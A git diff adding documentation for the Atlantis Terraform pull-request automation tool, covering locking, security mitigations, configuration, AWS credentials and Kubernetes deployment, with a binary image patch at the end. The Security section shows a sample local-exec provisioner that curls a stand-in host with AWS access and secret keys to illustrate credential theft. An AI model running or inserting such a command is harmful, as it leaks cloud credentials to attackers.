+When `plan` is run, the [project](#project) and [workspace](#workspaceenvironment) (**but not the whole repo**) are **Locked** until an `apply` succeeds **and** the pull request/merge request is merged.
+This protects against concurrent modifications to the same set of infrastructure and prevents
+users from seeing a `plan` that will be invalid if another pull request is merged.
+
+If you have multiple directories inside a single repository, only the directory will be locked. Not the whole repo.
+
+To unlock the project and workspace without completing an `apply` and merging, click the link
+at the bottom of the plan comment to discard the plan and delete the lock.
+Once a plan is discarded, you'll need to run `plan` again prior to running `apply` when you go back to that pull request.
+
+## Approvals
+If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply` simply run Atlantis with the `--require-approval` flag.
+By default, no approval is required.
+
+For more information on GitHub pull request reviews and approvals see: https://help.github.com/articles/about-pull-request-reviews/
+
+For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html.
+
+## Security
+Because you usually run Atlantis on a server with credentials that allow access to your infrastructure it's important that you deploy Atlantis securely.
+
+Atlantis could be exploited by
+* Running `terraform apply` on a malicious Terraform file with [local-exec](https://www.terraform.io/docs/provisioners/local-exec.html)
+```tf
+resource "null_resource" "null" {
+  provisioner "local-exec" {
+    command = "curl https://cred-stealer.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+  }
+}
+```
+* Running malicious hook commands specified in an `atlantis.yaml` file.
+* Someone adding `atlantis plan/apply` comments on your valid pull requests causing terraform to run when you don't want it to.
+
+### Mitigations
+#### Don't Use On Public Repos
+Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos until Atlantis gets an authentication system.
+
+#### Don't Use `--allow-fork-prs`
+If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false)
+because anyone can open up a pull request from their fork to your repo.
+
+#### `--repo-whitelist`
+Atlantis requires you to specify a whitelist of repositories it will accept webhooks from via the `--repo-whitelist` flag.
+For example:
+* Specific repositories: `--repo-whitelist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
+* Your whole organization: `--repo-whitelist=github.com/runatlantis/*`
+* Every repository in your GitHub Enterprise install: `--repo-whitelist=github.yourcompany.com/*`
+* All repositories: `--repo-whitelist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
+
+This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
+
+#### Webhook Secrets
+Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables.
+Even with the `--repo-whitelist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is whitelisted.
+Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
+
+
+## Server Configuration
+Configuration for `atlantis server` can be specified via command line flags, environment variables or a YAML config file.
+Config file values are overridden by environment variables which in turn are overridden by flags.
+
+### YAML
+To use a yaml config file, run atlantis with `--config /path/to/config.yaml`.
+The keys of your config file should be the same as the flag, ex.
+```yaml
+---
+gh-token: ...
+log-level: ...
+```
+
+### Environment Variables
+All flags can be specified as environment variables. You need to convert the flag's `-`'s to `_`'s, uppercase all the letters and prefix with `ATLANTIS_`.
+For example, `--gh-user` can be set via the environment variable `ATLANTIS_GH_USER`.
+
+To see a list of all flags and their descriptions run `atlantis server --help`
+
+## AWS Credentials
+Atlantis simply shells out to `terraform` so you don't need to do anything special with AWS credentials.
+As long as `terraform` works where you're hosting Atlantis, then Atlantis will work.
+See https://www.terraform.io/docs/providers/aws/#authentication for more detail.
+
+### Multiple AWS Accounts
+Atlantis supports multiple AWS accounts through the use of Terraform's
+[AWS Authentication](https://www.terraform.io/docs/providers/aws/#authentication).
+
+If you're using the [Shared Credentials file](https://www.terraform.io/docs/providers/aws/#shared-credentials-file)
+you'll need to ensure the server that Atlantis is executing on has the corresponding credentials file.
+
+If you're using [Assume role](https://www.terraform.io/docs/providers/aws/#assume-role)
+you'll need to ensure that the credentials file has a `default` profile that is able
+to assume all required roles.
+
+[Environment variables](https://www.terraform.io/docs/providers/aws/#environment-variables) authentication
+won't work for multiple accounts since Atlantis wouldn't know which environment variables to execute
+Terraform with.
+
+### Assume Role Session Names
+Atlantis injects the Terraform variable `atlantis_user` and sets it to the GitHub username of
+the user that is running the Atlantis command. This can be used to dynamically name the assume role
+session. This is used at Hootsuite so AWS API actions can be correlated with a specific user.
+
+To take advantage of this feature, use Terraform's [built-in support](https://www.terraform.io/docs/providers/aws/#assume-role) for assume role
+and use the `atlantis_user` terraform variable
+
+```hcl
+provider "aws" {
+  assume_role {
+    role_arn     = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
+    session_name = "${var.atlantis_user}"
+  }
+}
+
+# need to define the atlantis_user variable to avoid terraform errors
+variable "atlantis_user" {
+  default = "atlantis_user"
+}
+```
+
+If you're also using the [S3 Backend](https://www.terraform.io/docs/backends/types/s3.html)
+make sure to add the `role_arn` option:
+
+```hcl
+terraform {
+  backend "s3" {
+    bucket   = "mybucket"
+    key      = "path/to/my/key"
+    region   = "us-east-1"
+    role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
+    # can't use var.atlantis_user as the session name because
+    # interpolations are not allowed in backend configuration
+    # session_name = "${var.atlantis_user}" WON'T WORK
+  }
+}
+```
+
+Terraform doesn't support interpolations in backend config so you will not be
+able to use `session_name = "${var.atlantis_user}"`. However, the backend assumed
+role is only used for state-related API actions. Any other API actions will be performed using
+the assumed role specified in the `aws` provider and will have the session named as the GitHub user.
+
+## Glossary
+#### Project
+A Terraform project. Multiple projects can be in a single GitHub repo.
+We identify a project by its repo **and** the path to the root of the project within that repo.
+
+#### Workspace/Environment
+A Terraform workspace. See [terraform docs](https://www.terraform.io/docs/state/workspaces.html) for more information.
+
+## FAQ
+**Q: Does Atlantis affect Terraform [remote state](https://www.terraform.io/docs/state/remote.html)?**
+
+A: No. Atlantis does not interfere with Terraform remote state in any way. Under the hood, Atlantis is simply executing `terraform plan` and `terraform apply`.
+
+**Q: How does Atlantis locking interact with Terraform [locking](https://www.terraform.io/docs/state/locking.html)?**
+
+A: Atlantis provides locking of pull requests that prevents concurrent modification of the same infrastructure (Terraform project) whereas Terraform locking only prevents two concurrent `terraform apply`'s from happening.
+
+Terraform locking can be used alongside Atlantis locking since Atlantis is simply executing terraform commands.
+
+**Q: How to run Atlantis in high availability mode? Does it need to be?**
+
+A: Atlantis server can easily be run under the supervision of a init system like `upstart` or `systemd` to make sure `atlantis server` is always running.
+
+Atlantis currently stores all locking and Terraform plans locally on disk under the `--data-dir` directory (defaults to `~/.atlantis`). Because of this there is currently no way to run two or more Atlantis instances concurrently.
+
+However, if you were to lose the data, all you would need to do is run `atlantis plan` again on the pull requests that are open. If someone tries to run `atlantis apply` after the data has been lost then they will get an error back, so they will have to re-plan anyway.
+
+**Q: How to add SSL to Atlantis server?**
+
+A: First, you'll need to get a public/private key pair to serve over SSL.
+These need to be in a directory accessible by Atlantis. Then start `atlantis server` with the `--ssl-cert-file` and `--ssl-key-file` flags.
+See `atlantis server --help` for more information.
+
+**Q: How can I get Atlantis up and running on AWS?**
+
+A: There is [terraform-aws-atlantis](https://github.com/terraform-aws-modules/terraform-aws-atlantis) project where complete Terraform configurations for running Atlantis on AWS Fargate are hosted. Tested and maintained.
+
+## Contributing
+Want to contribute? Check out [CONTRIBUTING](https://github.com/runatlantis/atlantis/blob/master/CONTRIBUTING.md).
+
+## Credits
+Atlantis was originally developed at [Hootsuite](https://hootsuite.com) under [hootsuite/atlantis](https://github.com/hootsuite/atlantis). The maintainers are indebted to Hootsuite for supporting the creation and continued development of this project over the last 2 years. The Hootsuite values of building a better way and teamwork made this project possible, alongside constant encouragement and assistance from our colleagues.
+
+NOTE: We had to remove the "fork" label because otherwise code searches don't work.
+
+Thank you to these awesome contributors!
+- [@nicholas-wu-hs](https://github.com/nicholas-wu-hs)
+- [@nadavshatz](https://github.com/nadavshatz)
+- [@jwieringa](https://github.com/jwieringa)
+- [@suhussai](https://github.com/suhussai)
+- [@mootpt](https://github.com/mootpt)
+- [@codec](https://github.com/codec)
+- [@nick-hollingsworth-hs](https://github.com/nick-hollingsworth-hs)
+- [@mpmsimo](https://github.com/mpmsimo)
+- [@hussfelt](https://github.com/hussfelt)
+- [@psalaberria002](https://github.com/psalaberria002)
+
+* Atlantis Logo: Icon made by [freepik](https://www.flaticon.com/authors/freepik) from www.flaticon.com
+
diff --git a/runatlantis.io/docs/deployment.md b/runatlantis.io/docs/deployment.md
new file mode 100644
index 0000000000..cc6e5b1e08
--- /dev/null
+++ b/runatlantis.io/docs/deployment.md
@@ -0,0 +1,374 @@
+# Production-Ready Deployment
+[[toc]]
+## Install Terraform
+`terraform` needs to be in the `$PATH` for Atlantis.
+Download from https://www.terraform.io/downloads.html
+```bash
+unzip path/to/terraform_*.zip -d /usr/local/bin
+```
+Check that it's in your `$PATH`
+```
+$ terraform version
+Terraform v0.10.0
+```
+If you want to use a different version of Terraform see [Terraform Versions](#terraform-versions)
+
+## Hosting Atlantis
+Atlantis needs to be hosted somewhere that github.com/gitlab.com or your GitHub/GitLab Enterprise installation can reach. Developers in your organization also need to be able to access Atlantis to view the UI and to delete locks.
+
+By default Atlantis runs on port `4141`. This can be changed with the `--port` flag.
+
+## Add GitHub Webhook
+Once you've decided where to host Atlantis you can add it as a Webhook to GitHub.
+If you already have a GitHub organization we recommend installing the webhook at the **organization level** rather than on each repository, however both methods will work.
+
+::: tip
+If you're not sure if you have a GitHub organization see https://help.github.com/articles/differences-between-user-and-organization-accounts/
+:::
+
+If you're installing on the organization, navigate to your organization's page and click **Settings**.
+If installing on a single repository, navigate to the repository home page and click **Settings**.
+- Select **Webhooks** or **Hooks** in the sidebar
+- Click **Add webhook**
+- set **Payload URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`**
+- set **Content type** to `application/json`
+- set **Secret** to a random key (https://www.random.org/strings/). You'll need to pass this value to the `--gh-webhook-secret` option when you start Atlantis
+- select **Let me select individual events**
+- check the boxes
+	- **Pull request reviews**
+	- **Pushes**
+	- **Issue comments**
+	- **Pull requests**
+- leave **Active** checked
+- click **Add webhook**
+
+## Add GitLab Webhook
+If you're using GitLab, navigate to your project's home page in GitLab
+- Click **Settings > Integrations** in the sidebar
+- set **URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`**
+- leave **Secret Token** blank or set this to a random key (https://www.random.org/strings/). If you set it, you'll need to use the `--gitlab-webhook-secret` option when you start Atlantis
+- check the boxes
+    - **Push events**
+    - **Comments**
+    - **Merge Request events**
+- leave **Enable SSL verification** checked
+- click **Add webhook**
+
+## Create a GitHub Token
+We recommend creating a new user in GitHub named **atlantis** that performs all API actions, however you can use any user.
+
+**NOTE: The Atlantis user must have "Write permissions" (for repos in an organization) or be a "Collaborator" (for repos in a user account) to be able to set commit statuses:**
+![Atlantis status](./images/status.png)
+
+Once you've created the user (or have decided to use an existing user) you need to create a personal access token.
+- follow [https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token)
+- copy the access token
+
+## Create a GitLab Token
+We recommend creating a new user in GitLab named **atlantis** that performs all API actions, however you can use any user.
+Once you've created the user (or have decided to use an existing user) you need to create a personal access token.
+- follow [https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token](https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token)
+- create a token with **api** scope
+- copy the access token
+
+## Start Atlantis
+Now you're ready to start Atlantis!
+
+If you're using GitHub, run:
+```
+$ atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET
+2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141
+```
+
+If you're using GitLab, run:
+```
+$ atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET
+2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141
+```
+
+- `$URL` is the URL that Atlantis can be reached at
+- `$USERNAME` is the GitHub/GitLab username you generated the token for
+- `$TOKEN` is the access token you created. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_TOKEN` or `ATLANTIS_GITLAB_TOKEN`
+- `$SECRET` is the random key you used for the webhook secret. If you left the secret blank then don't specify this flag. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_WEBHOOK_SECRET` or `ATLANTIS_GITLAB_WEBHOOK_SECRET`
+
+Atlantis is now running!
+**We recommend running it under something like Systemd or Supervisord.**
+
+## Docker
+Atlantis also ships inside a docker image. Run the docker image:
+
+```bash
+docker run runatlantis/atlantis:latest server <required options>
+```
+
+### Usage
+If you need to modify the Docker image that we provide, for instance to add a specific version of Terraform, you can do something like this:
+
+* Create a custom docker file
+```bash
+vim Dockerfile-custom
+```
+
+```dockerfile
+FROM runatlantis/atlantis
+
+# copy a terraform binary of the version you need
+COPY terraform /usr/local/bin/terraform
+```
+
+* Build docker image
+
+```bash
+docker build -t {YOUR_DOCKER_ORG}/atlantis-custom -f Dockerfile-custom .
+```
+
+* Run docker image
+
+```bash
+docker run {YOUR_DOCKER_ORG}/atlantis-custom server --gh-user=GITHUB_USERNAME --gh-token=GITHUB_TOKEN
+```
+
+## Kubernetes
+Atlantis can be deployed into Kubernetes as a
+[Deployment](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/)
+or as a [Statefulset](https://kubernetes.io/docs/concepts/workloads/controllers/statefulset/) with persistent storage.
+
+StatefulSet is recommended because Atlantis stores its data on disk and so if your Pod dies
+or you upgrade Atlantis, you won't lose the data. On the other hand, the only data that
+Atlantis has right now is any plans that haven't been applied and Atlantis locks. If
+Atlantis loses that data, you just need to run `atlantis plan` again so it's not the end of the world.
+
+Regardless of whether you choose a Deployment or StatefulSet, first create a Secret with the webhook secret and access token:
+```
+echo -n "yourtoken" > token
+echo -n "yoursecret" > webhook-secret
+kubectl create secret generic atlantis-vcs --from-file=token --from-file=webhook-secret
+```
+
+Next, edit the manifests below as follows:
+1. Replace `<VERSION>` in `image: runatlantis/atlantis:<VERSION>` with the most recent version from https://github.com/runatlantis/atlantis/releases/latest.
+    * NOTE: You never want to run with `:latest` because if your Pod moves to a new node, Kubernetes will pull the latest image and you might end
+up upgrading Atlantis by accident!
+2. Replace `value: github.com/yourorg/*` under `name: ATLANTIS_REPO_WHITELIST` with the whitelist pattern
+for your Terraform repos. See [--repo-whitelist](#--repo-whitelist) for more details.
+3. If you're using GitHub:
+    1. Replace `<YOUR_GITHUB_USER>` with the username of your Atlantis GitHub user without the `@`.
+    2. Delete all the `ATLANTIS_GITLAB_*` environment variables.
+4. If you're using GitLab:
+    1. Replace `<YOUR_GITLAB_USER>` with the username of your Atlantis GitLab user without the `@`.
+    2. Delete all the `ATLANTIS_GH_*` environment variables.
+
+### StatefulSet Manifest
+<details>
+ <summary>Show...</summary>
+
+```yaml
+apiVersion: apps/v1
+kind: StatefulSet
+metadata:
+  name: atlantis
+spec:
+  serviceName: atlantis
+  replicas: 1
+  updateStrategy:
+    type: RollingUpdate
+    rollingUpdate:
+      partition: 0
+  selector:
+    matchLabels:
+      app: atlantis
+  template:
+    metadata:
+      labels:
+        app: atlantis
+    spec:
+      securityContext:
+        fsGroup: 1000 # Atlantis group (1000) read/write access to volumes.
+      containers:
+      - name: atlantis
+        image: runatlantis/atlantis:v<VERSION> # 1. Replace <VERSION> with the most recent release.
+        env:
+        - name: ATLANTIS_REPO_WHITELIST
+          value: github.com/yourorg/* # 2. Replace this with your own repo whitelist.
+
+        ## GitHub Config ###
+        - name: ATLANTIS_GH_USER
+          value: <YOUR_GITHUB_USER> # 3i. If you're using GitHub replace <YOUR_GITHUB_USER> with the username of your Atlantis GitHub user without the `@`.
+        - name: ATLANTIS_GH_TOKEN
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: token
+        - name: ATLANTIS_GH_WEBHOOK_SECRET
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: webhook-secret
+
+        ## GitLab Config ###
+        - name: ATLANTIS_GITLAB_USER
+          value: <YOUR_GITLAB_USER> # 4i. If you're using GitLab replace <YOUR_GITLAB_USER> with the username of your Atlantis GitLab user without the `@`.
+        - name: ATLANTIS_GITLAB_TOKEN
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: token
+        - name: ATLANTIS_GITLAB_WEBHOOK_SECRET
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: webhook-secret
+
+        - name: ATLANTIS_DATA_DIR
+          value: /atlantis
+        - name: ATLANTIS_PORT
+          value: "4141" # Kubernetes sets an ATLANTIS_PORT variable so we need to override.
+        volumeMounts:
+        - name: atlantis-data
+          mountPath: /atlantis
+        ports:
+        - name: atlantis
+          containerPort: 4141
+        resources:
+          requests:
+            memory: 256Mi
+            cpu: 100m
+          limits:
+            memory: 256Mi
+            cpu: 100m
+  volumeClaimTemplates:
+  - metadata:
+      name: atlantis-data
+    spec:
+      accessModes: ["ReadWriteOnce"] # Volume should not be shared by multiple nodes.
+      resources:
+        requests:
+          # The biggest thing Atlantis stores is the Git repo when it checks it out.
+          # It deletes the repo after the pull request is merged.
+          storage: 5Gi
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: atlantis
+spec:
+  ports:
+  - name: atlantis
+    port: 80
+    targetPort: 4141
+  selector:
+    app: atlantis
+```
+</details>
+
+
+### Deployment Manifest
+<details>
+ <summary>Show...</summary>
+
+```yaml
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: atlantis
+  labels:
+    app: atlantis
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app: atlantis
+  template:
+    metadata:
+      labels:
+        app: atlantis
+    spec:
+      containers:
+      - name: atlantis
+        image: runatlantis/atlantis:v<VERSION> # 1. Replace <VERSION> with the most recent release.
+        env:
+        - name: ATLANTIS_REPO_WHITELIST
+          value: github.com/yourorg/* # 2. Replace this with your own repo whitelist.
+
+        ## GitHub Config ###
+        - name: ATLANTIS_GH_USER
+          value: <YOUR_GITHUB_USER> # 3i. If you're using GitHub replace <YOUR_GITHUB_USER> with the username of your Atlantis GitHub user without the `@`.
+        - name: ATLANTIS_GH_TOKEN
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: token
+        - name: ATLANTIS_GH_WEBHOOK_SECRET
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: webhook-secret
+
+        ## GitLab Config ###
+        - name: ATLANTIS_GITLAB_USER
+          value: <YOUR_GITLAB_USER> # 4i. If you're using GitLab replace <YOUR_GITLAB_USER> with the username of your Atlantis GitLab user without the `@`.
+        - name: ATLANTIS_GITLAB_TOKEN
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: token
+        - name: ATLANTIS_GITLAB_WEBHOOK_SECRET
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: webhook-secret
+        - name: ATLANTIS_PORT
+          value: "4141" # Kubernetes sets an ATLANTIS_PORT variable so we need to override.
+        ports:
+        - name: atlantis
+          containerPort: 4141
+        resources:
+          requests:
+            memory: 256Mi
+            cpu: 100m
+          limits:
+            memory: 256Mi
+            cpu: 100m
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: atlantis
+spec:
+  ports:
+  - name: atlantis
+    port: 80
+    targetPort: 4141
+  selector:
+    app: atlantis
+```
+</details>
+
+### Routing and SSL
+The manifests above create a Kubernetes `Service` of type `ClusterIP` which isn't accessible outside your cluster.
+Depending on how you're doing routing into Kubernetes, you may want to use a `LoadBalancer` so that Atlantis is accessible
+to GitHub/GitLab and your internal users.
+
+If you want to add SSL you can use something like https://github.com/jetstack/cert-manager to generate SSL
+certs and mount them into the Pod. Then set the `ATLANTIS_SSL_CERT_FILE` and `ATLANTIS_SSL_KEY_FILE` environment variables to enable SSL.
+You could also set up SSL at your LoadBalancer.
+
+## AWS Fargate
+
+If you'd like to run Atlantis on [AWS Fargate](https://aws.amazon.com/fargate/) check out the Atlantis module on the Terraform Module Registry: https://registry.terraform.io/modules/terraform-aws-modules/atlantis/aws
+
+## Testing Out Atlantis on GitHub
+
+If you'd like to test out Atlantis before running it on your own repositories you can fork our example repo.
+
+- Fork https://github.com/runatlantis/atlantis-example
+- If you didn't add the Webhook as to your organization add Atlantis as a Webhook to the forked repo (see [Add GitHub Webhook](#add-github-webhook))
+- Now that Atlantis can receive events you should be able to comment on a pull request to trigger Atlantis. Create a pull request
+	- Click **Branches** on your forked repo's homepage
+	- click the **New pull request** button next to the `example` branch
+	- Change the `base` to `{your-repo}/master`
+	- click **Create pull request**
+- Now you can test out Atlantis
+	- Create a comment `atlantis help` to see what commands you can run from the pull request
+	- `atlantis plan` will run `terraform plan` behind the scenes. You should see the output commented back on the pull request. You should also see some logs show up where you're running `atlantis server`
+	- `atlantis apply` will run `terraform apply`. Since our pull request creates a `null_resource` (which does nothing) this is safe to do.
\ No newline at end of file
diff --git a/runatlantis.io/docs/getting-started.md b/runatlantis.io/docs/getting-started.md
new file mode 100644
index 0000000000..e69de29bb2
diff --git a/runatlantis.io/docs/images/atlantis-logo.png b/runatlantis.io/docs/images/atlantis-logo.png
new file mode 100644
index 0000000000000000000000000000000000000000..748e26771af638c3dea9a2c31626213b7e43bf38
GIT binary patch
literal 14750
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
